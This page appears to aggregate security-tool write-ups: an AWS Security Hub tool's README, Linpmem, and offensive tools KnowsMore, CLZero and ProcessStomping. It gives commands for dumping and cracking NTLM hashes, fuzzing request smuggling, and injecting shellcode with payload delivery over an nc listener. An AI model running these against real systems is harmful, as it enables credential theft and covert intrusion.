docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.

Build and Run Docker locally

Or you can also build it locally:

git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h

Run with Lambda

MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.

Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.

Terraform code is provided for deploying the Lambda function and all its dependencies.

Lambda use-cases

  • Trigger the MetaHub Lambda function each time there is a new security finding to enrich that finding back in AWS Security Hub.
  • Trigger the MetaHub Lambda function each time there is a new security finding for suppression based on Context.
  • Trigger the MetaHub Lambda function to identify the affected owner of a security finding based on Context and assign it using your internal systems.
  • Trigger the MetaHub Lambda function to create a ticket with enriched context.

Deploying Lambda

The terraform code for deploying the Lambda function is provided under the terraform/ folder.

Just run the following commands:

cd terraform
terraform init
terraform apply

The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.

Customize Lambda behaviour

You can customize MetaHub options for your lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.

Lambda Permissions

Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, you will need this if you are executing the Lambda in the Security Hub master account that is aggregating findings from other accounts), you will need to specify the role to assume, adding the option --mh-assume-role in the Lambda function configuration (See previous step) and adding the corresponding policy to allow the Lambda to assume that role in the lambda role.

Run with Security Hub Custom Action

MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.


The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function will run MetaHub with the option --enrich-findings, which means that it will update your finding back with MetaHub outputs. If you want to change this, see Customize Lambda behavior

You need first to create the Lambda function and then create the custom action in Security Hub.

For creating the lambda function, follow the instructions in the Run with Lambda section.

For creating the AWS Security Hub custom action:

  1. In Security Hub, choose Settings and then choose Custom Actions.
  2. Choose Create custom action.
  3. Provide a Name, Description, and Custom action ID for the action.
  4. Choose Create custom action. (Make a note of the Custom action ARN. You need to use the ARN when you create a rule to associate with this action in EventBridge.)
  5. In EventBridge, choose Rules and then choose Create rule.
  6. Enter a name and description for the rule.
  7. For the Event bus, choose the event bus that you want to associate with this rule. If you want this rule to match events that come from your account, select default. When an AWS service in your account emits an event, it always goes to your account's default event bus.
  8. For Rule type, choose a rule with an event pattern and then press Next.
  9. For Event source, choose AWS events.
  10. For the Creation method, choose Use pattern form.
  11. For Event source, choose AWS services.
  12. For AWS service, choose Security Hub.
  13. For Event type, choose Security Hub Findings - Custom Action.
  14. Choose Specific custom action ARNs and add a custom action ARN.
  15. Choose Next.
  16. Under Select targets, choose the Lambda function
  17. Select the Lambda function you created for MetaHub.

AWS Authentication

  • Ensure you have AWS credentials set up on your local machine (or from where you will run MetaHub).

For example, you can use aws configure option.

aws configure

Or you can export your credentials to the environment.

export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID= "ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY= "XXXXXXXXX"
export AWS_SESSION_TOKEN= "XXXXXXXXX"

Configuring Security Hub

  • If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in. Just use the options --sh-assume-role to specify the role and --sh-account with the same AWS Account ID where you are logged in.

  • --sh-region: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub Cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together.

  • --sh-account and --sh-assume-role: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS Account than the one where AWS Security Hub is running or when running AWS Security Hub in a multiple AWS Account setup. Both options must be used together. The role provided needs to have enough policies to get and update findings in AWS Security Hub (if needed). If you don't specify a --sh-account, MetaHub will assume the one you are logged in.

  • --sh-profile: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account or --sh-assume-role as MetaHub will use the credentials from the profile. If you are using --sh-account and --sh-assume-role, those options take precedence over --sh-profile.

IAM Policy for Security Hub

This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings action.

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"security hub:GetFindings",
"security hub:ListFindingAggregators",
"security hub:BatchUpdateFindings",
"iam:ListAccountAliases"
],
"Resource": [
"*"
]
}
]
}

Configuring Context

If you are running MetaHub for a multiple AWS Account setup (AWS Security Hub is aggregating findings from multiple AWS Accounts), you must provide the role to assume for Context queries because the affected resources are not in the same AWS Account that the AWS Security Hub findings. The --mh-assume-role will be used to connect with the affected resources directly in the affected account. This role needs to have enough policies for being able to describe resources.

IAM Policy for Context

The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit and the following actions:

  • tag:GetResources
  • lambda:GetFunction
  • lambda:GetFunctionUrlConfig
  • cloudtrail:LookupEvents
  • account:GetAlternateContact
  • organizations:DescribeAccount
  • iam:ListAccountAliases

Examples

Inputs

MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.

If you want to read from an input ASFF file, you need to use the options:

./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff

You also can combine AWS Security Hub findings with input ASFF files specifying both inputs:

./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff

When using a file as input, you can't use the option --sh-filters for filter findings, as this option relies on AWS API for filtering. You can't use the options --update-findings or --enrich-findings as those findings are not in the AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.

Output Modes

MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short, json-full, json-statistics, json-inventory, html, csv, and xlsx.

The outputs will be saved in the outputs/ folder with the execution date.

If you want only to generate a specific output mode, you can use the option --output-modes with the desired output mode.

For example, if you only want to generate the output json-short, you can use:

./metahub.py --output-modes json-short

If you want to generate json-short, json-full and html outputs, you can use:

./metahub.py --output-modes json-short json-full html

JSON

JSON-Short

Show all findings titles together under each affected resource and the AwsAccountId, Region, and ResourceType:

JSON-Full

Show all findings with all data. Findings are organized by ResourceId (ARN). For each finding, you will also get: SeverityLabel, Workflow, RecordState, Compliance, Id, and ProductArn:

JSON-Inventory

Show a list of all resources with their ARN.

JSON-Statistics

Show statistics for each field/value. In the output, you will see each field/value and the number of occurrences; for example, the following output shows statistics for six findings.

HTML

You can create rich HTML reports of your findings, adding your context as part of them.

HTML Reports are interactive in many ways:

  • You can add/remove columns.
  • You can sort and filter by any column.
  • You can auto-filter by any column
  • You can group/ungroup findings
  • You can also download that data to xlsx, CSV, HTML, and JSON.


CSV

You can create CSV reports of your findings, adding your context as part of them.

Β 

XLSX

Similar to CSV but with more formatting options.


Customize HTML, CSV or XLSX outputs

You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns and --output-config-columns (as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (See Customizing Configuration).

For example, you can generate an HTML output with Tags and add "Owner" and "Environment" as columns to your report using the:

./metahub --output-modes html --output-tag-columns Owner Environment

Filters

You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.

Security Hub Filtering

MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE filtering for AWS Security Hub using the option --sh-filters, the same way you would filter using AWS CLI but limited to the EQUALS comparison. If you want another comparison, use the option --sh-template Security Hub Filtering using YAML templates.

You can check available filters in AWS Documentation

./metahub --sh-filters <KEY=VALUE>

If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW

Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, adding SeverityLabel to the default filters:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW

If a value contains spaces, you should specify it using double quotes: "ProductName="Security Hub"

You can add how many different filters you need to your query and also add the same filter key with different values:

Examples:

  • Filter by Severity (CRITICAL):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
  • Filter by Severity (CRITICAL and HIGH):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
  • Filter by Severity and AWS Account:
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
  • Filter by Check Title:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
  • Filter by AWS Resource Type:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
  • Filter by Resource ID:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
  • Filter by Finding Id:
./metahub --sh-filters Id="arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
  • Filter by Compliance Status:
./metahub --sh-filters ComplianceStatus=FAILED

Security Hub Filtering using YAML templates

MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub like "EQUALS' | 'PREFIX' | 'NOT_EQUALS' | 'PREFIX_NOT_EQUALS". You can call your YAML file using the option --sh-template <<FILE>>.

You can find examples under the folder templates

  • Filter using YAML template default.yml:
./metaHub --sh-template templates/default.yml

Config Filters

MetaHub supports Config filters (and associations) using KEY=VALUE where the value can only be True or False using the option --mh-filters-config. You can use as many filters as you want and separate them using spaces. If you specify more than one filter, you will get all resources that match all filters.

Config filters only support True or False values:

  • A Config filter set to True means True or with data.
  • A Config filter set to False means False or without data.

Config filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Context for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-config, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are associated to Network Interfaces (network_interfaces=True):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
  • Get all S3 Buckets (ResourceType=AwsS3Bucket) only if they are public (public=True):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=False

Tags Filters

MetaHub supports Tags filters in the form of KEY=VALUE where KEY is the Tag name and value is the Tag Value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.

Tags filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Tags for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-tags, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are tagged with a tag Environment and value Production:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production

Updating Workflow Status

You can use MetaHub to update your AWS Security Hub Findings workflow status (NOTIFIED, NEW, RESOLVED, SUPPRESSED) with a single command. You will use the --update-findings option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. AWS Security Hub API is limited to 100 findings per update. Metahub will split your results into 100 items chucks to avoid this limitation and update your findings beside the amount.

For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW I found two affected resources with three finding each making six Security Hub findings in total.

Running the following update command will update those six findings' workflow status to NOTIFIED with a Note:

./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."




The --update-findings will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Enriching Findings

You can use MetaHub to enrich back your AWS Security Hub Findings with Context outputs using the option --enrich-findings. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields field for this.

By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.

For example, you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW, RecordState=ACTIVE, and ResourceType=AwsS3Bucket that are public=True with Context outputs:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-checks public=True --enrich-findings



The --enrich-findings will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Findings Aggregation

Working with Security Findings sometimes introduces the problem of Shadowing and Duplication.

Shadowing is when two checks refer to the same issue, but one in a more generic way than the other one.

Duplication is when you use more than one scanner and get the same problem from more than one.

Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.

If you are using one of the default Security Standards like AWS-Foundational-Security-Best-Practices, you will get two findings for the same issue:

  • EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
  • EC2.19 Security groups should not allow unrestricted access to ports with high risk

If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:

  • 4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389

Now, imagine that SG is not in use. In that case, Security Hub will show an additional fourth finding for your resource!

  • EC2.22 Unused EC2 security groups should be removed

So now you have in your dashboard four findings for one resource!

Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.

MetaHub aggregates security findings under the affected resource.

This is how MetaHub shows the previous example with output-mode json-short:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

This is how MetaHub shows the previous example with output-mode json-full:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

Your findings are combined under the ARN of the resource affected, ending in only one result or one non-compliant resource.

You can now work in MetaHub with all these four findings together as if they were only one. For example, you can update these four Workflow Status findings using only one command: See Updating Workflow Status

Contributing

You can follow this guide if you want to contribute to the Context module guide.



KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)

By: Zion3R


KnowsMore officially supports Python 3.8+.

Main features

  • Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
  • Import NTLM Hashes from NTDS.dit and SYSTEM
  • Import Cracked NTLM hashes from hashcat output file
  • Import BloodHound ZIP or JSON file
  • BloodHound importer (import JSON to Neo4J without BloodHound UI)
  • Analyse the quality of password (length , lower case, upper case, digit, special and latin)
  • Analyse similarity of password with company and user name
  • Search for users, passwords and hashes
  • Export all cracked credentials direct to BloodHound Neo4j Database as 'owned object'
  • Other amazing features...

Getting stats

knowsmore --stats

This command will produce several statistics about the passwords like the output bellow

weak passwords by company name similarity +-------+--------------+---------+----------------------+-------+ | top | password | score | company_similarity | qty | |-------+--------------+---------+----------------------+-------| | 1 | company123 | 7024 | 80 | 1111 | | 2 | Company123 | 5209 | 80 | 824 | | 3 | company | 3674 | 100 | 553 | | 4 | Company@10 | 2080 | 80 | 329 | | 5 | company10 | 1722 | 86 | 268 | | 6 | Company@2022 | 1242 | 71 | 202 | | 7 | Company@2024 | 1015 | 71 | 165 | | 8 | Company2022 | 978 | 75 | 157 | | 9 | Company10 | 745 | 86 | 116 | | 10 | Company21 | 707 | 86 | 110 | +-------+--------------+---------+----------------------+-------+ " dir="auto">
KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore

[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db

[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+

[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+

[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+

Installation

Simple

pip3 install --upgrade knowsmore

Note: If you face problem with dependency version Check the Virtual ENV file

Execution Flow

There is no an obligation order to import data, but to get better correlation data we suggest the following execution flow:

  1. Create database file
  2. Import BloodHound files
    1. Domains
    2. GPOs
    3. OUs
    4. Groups
    5. Computers
    6. Users
  3. Import NTDS file
  4. Import cracked hashes

Create database file

All data are stored in a SQLite Database

knowsmore --create-db

Importing BloodHound files

We can import all full BloodHound files into KnowsMore, correlate data, and sync it to Neo4J BloodHound Database. So you can use only KnowsMore to import JSON files directly into Neo4j database instead of use extremely slow BloodHound User Interface

# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip

# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json

Note: The KnowsMore is capable to import BloodHound ZIP File and JSON files, but we recommend to use ZIP file, because the KnowsMore will automatically order the files to better data correlation.

Sync data to Neo4j BloodHound database

# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678

Note: The KnowsMore implementation of bloodhount-importer was inpired from Fox-It BloodHound Import implementation. We implemented several changes to save all data in KnowsMore SQLite database and after that do an incremental sync to Neo4J database. With this strategy we have several benefits such as at least 10x faster them original BloodHound User interface.

Importing NTDS file

Option 1

Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry

knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM

Option 2

Note: First use the secretsdump to extract ntds hashes with the command bellow

secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name

After that import

knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds

Generating a custom wordlist

knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name

Importing cracked hashes

Cracking hashes

First extract all hashes to a txt file

# Extract NTLM hashes to file
nowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"

# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt

In order to crack the hashes, I usually use hashcat with the command bellow

# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"

# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a

importing hashcat output file

knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt

Note: Change clientCompanyName to name of your company

Wipe sensitive data

As the passwords and his hashes are extremely sensitive data, there is a module to replace the clear text passwords and respective hashes.

Note: This command will keep all generated statistics and imported user data.

knowsmore --wipe

BloodHound Mark as owned

One User

During the assessment you can find (in a several ways) users password, so you can add this to the Knowsmore database

knowsmore --user-pass --username administrator --password Sec4US@2023

# or adding the company name

knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us

Integrate all credentials cracked to Neo4j Bloodhound database

knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456

To remote connection make sure that Neo4j database server is accepting remote connection. Change the line bellow at the config file /etc/neo4j/neo4j.conf and restart the service.

server.bolt.listen_address=0.0.0.0:7687


CLZero - A Project For Fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors

By: Zion3R


A project for fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors.

About

Thank you to @albinowax, @defparam and @d3d else this tool would not exist. Inspired by the tool Smuggler all attack gadgets adapted from Smuggler and https://portswigger.net/research/how-to-turn-security-research-into-profit

For more info see: https://moopinger.github.io/blog/fuzzing/clzero/tools/request/smuggling/2023/11/15/Fuzzing-With-CLZero.html


Usage

usage: clzero.py [-h] [-url URL] [-file FILE] [-index INDEX] [-verbose] [-no-color] [-resume] [-skipread] [-quiet] [-lb] [-config CONFIG] [-method METHOD]

CLZero by Moopinger

optional arguments:
-h, --help show this help message and exit
-url URL (-u), Single target URL.
-file FILE (-f), Files containing multiple targets.
-index INDEX (-i), Index start point when using a file list. Default is first line.
-verbose (-v), Enable verbose output.
-no-color Disable colors in HTTP Status
-resume Resume scan from last index place.
-skipread Skip the read response on smuggle requests, recommended. This will save a lot of time between requests. Ideal for targets with standard HTTP traffic.
-quiet (-q), Disable output. Only successful payloads will be written to ./payloads/
-lb Last byte sync method for least request latency. Due to th e nature of the request, it cannot guarantee that the smuggle request will be processed first. Ideal for targets with a high
amount of traffic, and you do not mind sending multiple requests.
-config CONFIG (-c) Config file to load, see ./configs/ to create custom payloads
-method METHOD (-m) Method to use when sending the smuggle request. Default: POST

single target attack:

  • python3 clzero.py -u https://www.target.com/ -c configs/default.py -skipread

  • python3 clzero.py -u https://www.target.com/ -c configs/default.py -lb

Multi target attack:

  • python3 clzero.py -l urls.txt -c configs/default.py -skipread

  • python3 clzero.py -l urls.txt -c configs/default.py -lb

Install

git clone https://github.com/Moopinger/CLZero.git
cd CLZero
pip3 install -r requirements.txt


ProcessStomping - A Variation Of ProcessOverwriting To Execute Shellcode On An Executable'S Section

By: Zion3R


A variation of ProcessOverwriting to execute shellcode on an executable's section

What is it

For a more detailed explanation you can read my blog post

Process Stomping, is a variation of hasherezade’s Process Overwriting and it has the advantage of writing a shellcode payload on a targeted section instead of writing a whole PE payload over the hosting process address space.

These are the main steps of the ProcessStomping technique:

  1. CreateProcess - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the processes primary thread.
  2. WriteProcessMemory - used to write each malicious shellcode to the target process section.
  3. SetThreadContext - used to point the entrypoint to a new code section that it has written.
  4. ResumeThread - self-explanatory.

As an example application of the technique, the PoC can be used with sRDI to load a beacon dll over an executable RWX section. The following picture describes the steps involved.


Disclaimer

All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

Credits

This work has been made possible because of the knowledge and tools shared by Aleksandra Doniec @hasherezade and Nick Landers.

Usage

Select your target process and modify global variables accordingly in ProcessStomping.cpp.

Compile the sRDI project making sure that the offset is enough to jump over your generated sRDI shellcode blob and then update the sRDI tools:

cd \sRDI-master

python .\lib\Python\EncodeBlobs.py .\

Generate a Reflective-Loaderless dll payload of your choice and then generate sRDI shellcode blob:

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

The shellcode blob can then be xored with a key-word and downloaded using a simple socket

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

Deliver the xored blob upon connection

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

The sRDI blob will get erased after execution to remove unneeded artifacts.

Caveats

To successfully execute this technique you should select the right target process and use a dll payload that doesn't come with a User Defined Reflective loader.

Detection opportunities

Process Stomping technique requires starting the target process in a suspended state, changing the thread's entry point, and then resuming the thread to execute the injected shellcode. These are operations that might be considered suspicious if performed in quick succession and could lead to increased scrutiny by some security solutions.



OpenSSH 9.6p1

This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.

Linpmem - A Physical Memory Acquisition Tool For Linux

By: Zion3R


Like its Windows counterpart, Winpmem, this is not a traditional memory dumper. Linpmem offers an API for reading from any physical address, including reserved memory and memory holes, but it can also be used for normal memory dumping. Furthermore, the driver offers a variety of access modes to read physical memory, such as byte, word, dword, qword, and buffer access mode, where buffer access mode is appropriate in most standard cases. If reading requires an aligned byte/word/dword/qword read, Linpmem will do precisely that.

Currently, the Linpmem features:

  1. Read from physical address (access mode byte, word, dword, qword, or buffer)
  2. CR3 info service (specify target process by pid)
  3. Virtual to physical address translation service

Cache Control is to be added in future for support of the specialized read access modes.


Building the kernel driver

At least for now, you must compile the Linpmem driver yourself. A method to load a precompiled Linpmem driver on other Linux systems is currently under work, but not finished yet. That said, compiling the Linpmem driver is not difficult, basically it's executing 'make'.

Step 1 - getting the right headers

You need make and a C compiler. (We recommend gcc, but clang should work as well).

Make sure that you have the linux-headers installed (using whatever package manager your target linux distro has). The exact package name may vary on your distribution. A quick (distro-independent) way to check if you have the package installed:

ls -l /usr/lib/modules/`uname -r`/

That's it, you can proceed to step 2.

Foreign system: Currently, if you want to compile the driver for another system, e.g., because you want to create a memory dump but can't compile on the target, you have to download the header package directly from the package repositories of that system's Linux distribution. Double-check that the package version exactly matches the release and kernel version running on the foreign system. In case the other system is using a self-compiled kernel you have to obtain a copy of that kernel's build directory. Then, place the location of either directory in the KDIR environment variable.

export KDIR=path/to/extracted/header/package/or/kernel/root

Step 2 - make

Compiling the driver is simple, just type:

make

This should produce linpmem.ko in the current working directory.

You might want to check precompiler.h before and chose whether to compile for release or debug (e.g., with debug printing). There aren't much other precompiler settings right now.

Loading The Driver

The linpmem.ko module can be loaded by using insmod path-to-linpmem.ko, and unloaded with rmmod path-to-linpmem.ko. (This will load the driver only for this uptime.) If you compiled for debug, also take a look at dmesg.

After loading, for talking to the driver, you need to create the device:

mknod /dev/linpmem c 42 0

If you can't talk to the driver, potentially check in dmesg log to verify that '42' was indeed the registered major:

[12827.900168] linpmem: registered chrdev with major 42

Though usually the kernel would try to really assign this number.

You can use chown on the device to give it to your user, if you do not want to have a root console open all the time. (Or just keep using it in a root console.)

  • Watch dmesg output. Please report errors if you see any!
  • Warning: if there is a dmesg error print from Linpmem telling to reboot, better do it immediately.
  • Warning: this is an early version.

Usage

Demo Code

